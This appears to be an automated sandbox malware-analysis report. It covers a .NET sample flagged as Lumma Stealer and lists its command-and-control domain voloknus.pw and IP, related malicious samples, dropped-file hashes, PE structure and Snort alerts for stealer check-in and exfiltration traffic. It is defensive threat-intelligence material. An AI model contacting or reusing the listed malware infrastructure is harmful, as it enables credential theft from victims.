https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	RegAsm.exe, 00000002.00000002.1784602904.0000000003BD4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://purchase.aspose.com/policies/use-license	Aspose.Total.NET.lic	false		high
https://ac.ecosia.org/autocomplete?q=	RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://voloknus.pw/apiX	RegAsm.exe, 00000002.00000002.1779531861.00000000035D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://voloknus.pw/apiV	RegAsm.exe, 00000002.00000002.1774845977.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://voloknus.pw/apiS	RegAsm.exe, 00000002.00000002.1774845977.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://voloknus.pw/(	RegAsm.exe, 00000002.00000002.1774845977.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	RegAsm.exe, 00000002.00000002.1781462307.00000000039F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://voloknus.pw/apie	RegAsm.exe, 00000002.00000002.1774845977.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://voloknus.pw/apib	RegAsm.exe, 00000002.00000002.1774845977.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegAsm.exe, 00000002.00000002.1779531861.00000000035C8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.84.113	voloknus.pw	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1338247
Start date and time:	2023-11-07 15:20:15 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	TT4ybwWc1T.exe renamed because original name is a hash value
Original Sample Name:	A7DCEF177AF8AC4D8FF3A4A2FFA635CE.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@3/2@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 133 Number of non-executed functions: 202
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:21:06	API Interceptor	9x Sleep call for process: TT4ybwWc1T.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.84.113	update_1630227239.dll	Get hash	malicious	IcedID	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	D2y8mc7dzk.exe	Get hash	malicious	FormBook	Browse	23.227.38.32
	http://special.beatifulllhistory.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	Document(s) NewtoncrouchCust#45182 Open Invoice for PO#6329.msg	Get hash	malicious	HTMLPhisher	Browse	104.21.19.73
	http://alpha-omegainc.com/iu/?01044941	Get hash	malicious	Unknown	Browse	172.67.38.66
	SOA.exe	Get hash	malicious	GuLoader	Browse	104.21.52.95
	Overdue_Payment.exe	Get hash	malicious	FormBook	Browse	172.67.191.39
	https://www.googleadservices.com/pagead/aclk?sa=L&ai=COuGHcTBKZbLIGr-YvPIP04WFmAG_37ytc6aXtYXBEduty8bdOhABIJji0QpgyYaAgOykgBCgAcWbibMpyAEJqAMByAPLBKoE_wFP0K-A9AHlrpGbpIT3fMJlh-Qr9cJ8u3IuV0MtJIIR0OoAnkgWEvCzAnRpqX5GERdNcBveFqtu_JY1slPHTJYzq_17fbxeS7GAmsiK0NWVq1RuKtl2956yNKi8mS0LUc7MWNQvWpHdFHV7UufHYzmWWOO9JaaEC510PBxDaOPDiwjuNzLKQujAVnj5fuHZaoJuiYTOcd2_Tl8AQ3gGqiryPhO8J3lKwIGcMf1Hl0mua2GpUqqqoF5MmKDQ769L50m9hqnVxYTBX4akEMDJUUotWXMI6ixj1GaN5tH-JINuFyia8o6BknU21U8hyXhFCR0dDsBorEWwQtpEVdYYlmjABOzgz7u8BIgFk-TDzkqgBi6AB8XT2ZIEqAfZtrECqAeOzhuoB5PYG6gH7paxAqgH_p6xAqgHpKOxAqgH1ckbqAemvhuoB5oGqAfz0RuoB5bYG6gHqpuxAqgHg62xAqgH_56xAqgH35-xAtgHANIIFAiAYRABGB8yAooCOgKAQEi9_cE6sQl4_qCGfSR_DIAKAZgLAcgLAYAMAaIMDCoKCgjktLEC7rWxAqoNAlVTyA0B2BMMiBQB0BUB-BYBgBcB&ae=1&gclid=EAIaIQobChMI8sS7zfSxggMVPwxPCB3TQgETEAEYASAAEgLGN_D_BwE&num=1&cid=CAQSPADICaaNxCMJ34ZG83yg5PC4qa_WUxGPfrR-ZxuUh-eOwnzoklVXY2WmN2Zup97GZyW9Rq3hRqFNUKkpuxgB&sig=AOD64_3wUAE3_d73F5tpHcbor7fm8uvYBw&client=ca-pub-3163897643915446&rf=1&nb=8&adurl=http://carbonatebrowser.com/rd2/%3Fid%3D236888ZXIuY29tL2xwL3RpZGUv%26source%3Dgoogle-d%26c%3Dblendedaudadblocker%26cid%3D661475352217%26placement%3Dvirusscan.jotti.org%26keyword%3D%26target%3Dsegment_be_a_7340917995864277785%26position%3D%26gclid%3DEAIaIQobChMI8sS7zfSxggMVPwxPCB3TQgETEAEYASAAEgLGN_D_BwE	Get hash	malicious	Unknown	Browse	172.67.175.224
	https://secure.payment-gateway.microransom.us/XZHpGV1ZURTNSMFFyYW10dFVYVktaSEZoUlU5c0wwWllLMFpZV0dVM2JHSnliWEZYWVdRNWNVZHJSazVpWmxad1QwRkJURzUwWkVoRmEyOVlaMFkyUm5Kd2RXSjRRemRuU0dKek1rNUNRV3RZZEM5MlZXVnJXR3RKV0hsWWExbzJTekZrUjNsYVlsUnhSazV6YW5NelVIazFORUppV25JNFNrdFhSWG80VjFSTk4wb3ZXUzlaVFZGclJVdHJVbEl5ZEZKSmNuQnRNbXBuYVdOVFJ6UlFZa3hxTjBkbFFUY3dkRFpoWTFnd1dqbEdOMU5WTDBncmNTdFphbnBCUkVscExTMXNMMUJQU1VKcVdteHBXV2R6Y0hoSEx6RnRWME4zUFQwPS0tMWMwZGQwOWYwYWYzYmM3YTA3YjM5YWQ2YzBiMzY4NzdhMDI1OGZlYw==?cid=1785382594	Get hash	malicious	Unknown	Browse	1.1.1.1
	ATTN 6129.htm	Get hash	malicious	HTMLPhisher	Browse	104.21.30.91
	m-vergeer.ternair@outlook.com sent you files via sendbig.com.msg	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://padlet.com/denise447/new-order-po-0037228-bumblebee-5ddlvakuf10xfg0o	Get hash	malicious	Unknown	Browse	172.64.144.177
	ATTN_4150.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	OIARlFNfU8.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Vidar, Xmrig	Browse	104.21.20.155
	Quotation11012023.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	file.exe	Get hash	malicious	FormBook	Browse	104.21.59.34
	http://stream-sports.org/	Get hash	malicious	Unknown	Browse	104.21.11.245
	http://stream-sports.org/	Get hash	malicious	Unknown	Browse	104.21.11.245
	Br1RegY9iN.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.214.85
	z9f5QHrbNk.exe	Get hash	malicious	CryptOne, LummaC Stealer, SmokeLoader	Browse	104.21.48.160
	U4gOa40Df6.exe	Get hash	malicious	CryptOne, LummaC Stealer	Browse	172.67.154.84

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Br1RegY9iN.exe	Get hash	malicious	LummaC Stealer	Browse
	glitters.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader, Vidar	Browse
	wlScUalMUZ.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader, Vidar	Browse
	Reserva_Detalhes.ppam	Get hash	malicious	RevengeRAT	Browse
	SecuriteInfo.com.Win32.TrojanX-gen.31700.18376.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLine, SmokeLoader, Vidar	Browse
	QvConnect32.EXE.exe	Get hash	malicious	Agniane Stealer, zgRAT	Browse
	3cbMRBR4kD.exe	Get hash	malicious	LummaC Stealer, zgRAT	Browse
	Z5ZWH2EXy5.exe	Get hash	malicious	LummaC Stealer, zgRAT	Browse
	Fj43KNSNWt.exe	Get hash	malicious	RevengeRAT	Browse
	Reserva_Detalhes.ppam	Get hash	malicious	RevengeRAT	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	LummaC Stealer, zgRAT	Browse
	24zU4pepXX.exe	Get hash	malicious	Amadey, Babadeda, Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse
	SlAtoii4Y8.exe	Get hash	malicious	PrivateLoader, RisePro Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	RedLine, zgRAT	Browse
	0r9sypfxXu.exe	Get hash	malicious	Amadey, Babadeda, Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse
	ztA762yHV4.exe	Get hash	malicious	Amadey, Babadeda, Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse
	P93kkuEgKe.exe	Get hash	malicious	Amadey, Babadeda, Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse
	On2MRA1CLO.exe	Get hash	malicious	Amadey, Babadeda, Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse
	bqqozJNTy0.exe	Get hash	malicious	Amadey, Babadeda, Glupteba, Mystic Stealer, Raccoon Stealer v2, RedLine, SmokeLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TT4ybwWc1T.exe.log

Download File

Process:	C:\Users\user\Desktop\TT4ybwWc1T.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1143
Entropy (8bit):	5.357978016186991
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kzer84j:MxHKlYHKh3oPHKMRatHo6hAHKzervj
MD5:	064BF368F2461B44A23065543CE99823
SHA1:	6971597A9067CAE6E2C37A0BAA3A0F316CA2EADE
SHA-256:	61549B81CD40D3A49DFE9B978731A6E83E560F73FF8C0A970309E03447CE50D5
SHA-512:	088EBD7C75DC74E78E4E469C8E0E7913F934EAEA5A085EB98B8578C9CC5571CDBAED627AC64AB4B85D646F4B4D5E2D716261D13828A534BBACA51E2C3E98B0B2
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Download File

Process:	C:\Users\user\Desktop\TT4ybwWc1T.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	760320
Entropy (8bit):	6.561572491684602
Encrypted:	false
SSDEEP:	12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
MD5:	544CD51A596619B78E9B54B70088307D
SHA1:	4769DDD2DBC1DC44B758964ED0BD231B85880B65
SHA-256:	DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
SHA-512:	F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: Br1RegY9iN.exe, Detection: malicious, Browse Filename: glitters.exe, Detection: malicious, Browse Filename: wlScUalMUZ.exe, Detection: malicious, Browse Filename: Reserva_Detalhes.ppam, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.TrojanX-gen.31700.18376.exe, Detection: malicious, Browse Filename: QvConnect32.EXE.exe, Detection: malicious, Browse Filename: 3cbMRBR4kD.exe, Detection: malicious, Browse Filename: Z5ZWH2EXy5.exe, Detection: malicious, Browse Filename: Fj43KNSNWt.exe, Detection: malicious, Browse Filename: Reserva_Detalhes.ppam, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 24zU4pepXX.exe, Detection: malicious, Browse Filename: SlAtoii4Y8.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 0r9sypfxXu.exe, Detection: malicious, Browse Filename: ztA762yHV4.exe, Detection: malicious, Browse Filename: P93kkuEgKe.exe, Detection: malicious, Browse Filename: On2MRA1CLO.exe, Detection: malicious, Browse Filename: bqqozJNTy0.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.378628923787436
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	TT4ybwWc1T.exe
File size:	4'340'736 bytes
MD5:	a7dcef177af8ac4d8ff3a4a2ffa635ce
SHA1:	567f11c22c9651cb1db4ff29c1535a1893bc7c27
SHA256:	d2c7f4155786a209bdf84fb13f664fb283eaaeb7607d23ff4e5edae510f1ecd8
SHA512:	3b05e4dd426933c24ad15bfbaefc41a55b24c979264e59e75544710359998343c0dd2f2b9fb9c31036cbddf52fbe4a2e0794d0fa751d2983ab50cebc76739145
SSDEEP:	98304:V8S5kV//FB8ZfgVUs+wuScrrajjjBghqO80:V8SqV//FBmTEc+HFL0
TLSH:	3016C01D7A558A35D16BBB32E9E2003847B2D283E711F78B36FD12950D133DE4DC8A9A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....De..............P...?..X........@.. ... @...@.. ........................B...........@................................

File Icon


Icon Hash:	272028303034783f

Static PE Info

General

Entrypoint:	0x80001e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6544E9E8 [Fri Nov 3 12:39:04 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3fffd0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x402000	0x254b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x428000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3fff6d	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x3fe024	0x3fe200	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x402000	0x254b8	0x25600	False	0.2089974393812709	data	4.858755494095081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x428000	0xc	0x200	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x402280	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.50177304964539
RT_ICON	0x4026e8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	0.37254098360655735
RT_ICON	0x403070	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.3067542213883677
RT_ICON	0x404118	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.2161825726141079
RT_ICON	0x4066c0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.18711620217288616
RT_ICON	0x40a8e8	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	0.13495900777801134
RT_ICON	0x413d90	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.11453034425647698
RT_ICON	0x4245b8	0x28ed	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9927460150806529
RT_GROUP_ICON	0x426ea8	0x76	data	0.7372881355932204
RT_VERSION	0x426f20	0x3ac	data	0.3819148936170213
RT_MANIFEST	0x4272cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.8104.21.84.11349707802048093 11/07/23-15:21:09.706614	TCP	2048093	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In	49707	80	192.168.2.8	104.21.84.113
192.168.2.8104.21.84.11349706802048094 11/07/23-15:21:10.249764	TCP	2048094	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration	49706	80	192.168.2.8	104.21.84.113
192.168.2.8104.21.84.11349738802048094 11/07/23-15:21:44.390174	TCP	2048094	ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration	49738	80	192.168.2.8	104.21.84.113

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2023 15:21:08.365536928 CET	49706	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:08.518167973 CET	80	49706	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:08.518253088 CET	49706	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:08.518591881 CET	49706	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:08.518640041 CET	49706	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:08.671147108 CET	80	49706	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:08.671168089 CET	80	49706	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:08.995186090 CET	80	49706	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:08.995218992 CET	80	49706	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:08.995286942 CET	49706	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:09.552397966 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:09.704818010 CET	80	49707	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:09.705919027 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:09.706614017 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:09.858835936 CET	80	49707	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.188783884 CET	80	49707	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.188854933 CET	80	49707	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.188894987 CET	80	49707	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.188934088 CET	80	49707	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.188976049 CET	80	49707	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.189013958 CET	80	49707	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.189052105 CET	80	49707	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.189064980 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.189064980 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.189064980 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.189064980 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.189064980 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.189064980 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.189090967 CET	80	49707	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.189111948 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.189136028 CET	80	49707	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.189268112 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.189268112 CET	49707	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.249763966 CET	49706	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.250430107 CET	49706	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.402440071 CET	80	49706	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.402858019 CET	80	49706	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.676335096 CET	80	49706	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.676403999 CET	80	49706	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.676460028 CET	49706	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.678275108 CET	49706	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.687753916 CET	49708	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.841324091 CET	80	49708	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:10.841557980 CET	49708	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.841923952 CET	49708	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:10.842598915 CET	49708	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:11.004057884 CET	80	49708	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:11.004081964 CET	80	49708	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:11.330980062 CET	80	49708	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:11.331041098 CET	80	49708	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:11.331150055 CET	49708	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:11.333048105 CET	49708	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:11.342720985 CET	49709	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:11.495171070 CET	80	49709	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:11.495491982 CET	49709	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:11.495646954 CET	49709	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:11.496978998 CET	49709	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:11.648077011 CET	80	49709	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:11.649235964 CET	80	49709	104.21.84.113	192.168.2.8
